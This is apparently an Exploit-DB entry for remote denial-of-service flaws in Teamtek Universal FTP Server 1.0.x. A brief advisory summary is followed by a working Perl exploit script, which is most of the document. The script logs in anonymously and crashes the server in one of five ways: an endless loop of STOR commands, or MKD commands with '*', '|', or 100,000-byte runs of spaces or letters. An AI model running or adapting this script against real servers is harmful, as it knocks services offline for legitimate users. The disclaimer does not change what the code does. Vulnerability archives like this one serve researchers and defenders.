Teamtek Universal FTP Server - Multiple Commands Remote Denial of Service Vulnerabilities

EDB-ID:

29036




Platform:

Windows

Date:

2006-11-15


source: https://www.securityfocus.com/bid/21085/info

Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. 

An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 

We are currently unable to confirm the affected versions due to conflicting product information.

#!/usr/bin/perl -w
     ##########################################################################################################
     ######################Develop Telangana! or Give
     Telangana!!!#############################################
     ################################INDIA is
     Great############################################################
     ##########################################################################################################
     #
     # Teamtek Universal FTP Server 1.0.50 allows remote attackers to
     cause a denial of service (daemon crash or hang) via (1)
     # multiple STOR (aka PUT) commands, or an MKD command followed by
     (2) a '*' argument, (3) a '|' argument,
     # (4) spaces, or (5) a long string. NOTE: the provenance of this
     information is unknown; the details are obtained solely
     # from third party information.
     #
     # References:
     #    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
     #    https://www.securityfocus.com/bid/21085
     #
     # Tested on Windows XP SP1 with
     # Universal FTP Server 1.0.44
     # Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli -
     www.teamtek.net <http://www.teamtek.net/> - www.5e5.net
     <http://www.5e5.net/>
     # With "mkdir |" command application crashes with "Run-time error
     '52:' Bad file name or number"
     # With "mkdir *" command application crashes with "Run-time error
     '76:' Path not found"
     #
     # To run this exploit on MS Windows replace "#!usr/bin/perl -w"
     with "#!Installation_path_for_perl -w"
     #     (say #!C:/Perl/bin/perl -w)
     #
     # This was strictly written for educational purpose. Use it at
     your own risk.
     # Author will not bare any responsibility for any damages watsoever.
     #
     #  Author: Praveen Darhanam
     #  Email: praveen[underscore]recker[at]sify.com <http://sify.com/>
     #  Blog: http://darshanams.blogspot.com
     <http://darshanams.blogspot.com/>
     #  Date: 20th December, 2008
     #
     ########################################################################################
     use Net::FTP;

     $ftp_dos_mkd=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot
     connect to Host $ARGV[0]\n Usage: ]#perl script_name

     vuln_target_ip r Host\n";
     $ftp_dos_mkd -> login("anonymous","anonymous") || die "Could not
     Login...Retry";

     print "Enter 1 to launch FTP DoS using using multiple STOR/PUT
     commands\n";
     print "Enter 2 to launch FTP DoS using directory name as * with
     MKD command\n";
     print "Enter 3 to launch FTP DoS using directory name as | with
     MKD command\n";
     print "Enter 4 to launch FTP DoS using MKD command followed by
     spaces\n";
     print "Enter 5 to launch FTP DoS using MKD command followed by
     long string\n";

     $special_char=<STDIN>;
     chomp($special_char);

     if($special_char==1)
     {
      while(1)
      {
       $ftp_dos_mkd -> stor("abc.txt");
      }
     }
     elsif($special_char==2)
     {
      $ftp_dos_mkd -> mkdir("*");
     }
     elsif($special_char==3)
     {
      $ftp_dos_mkd -> mkdir("|");
     }
     elsif($special_char==4)
     {
      my $buf1 = "\x20" x 100000;
      $ftp_dos_mkd -> mkdir("$buf1");
     }
     elsif($special_char==5)
     {
      my $buf2 = "D" x 100000;
      $ftp_dos_mkd -> mkdir("$buf2");
     }
     else
     {
      printf "Please enter correct number to launch exploit !!";
     }

     $ftp_dos_mkd->quit;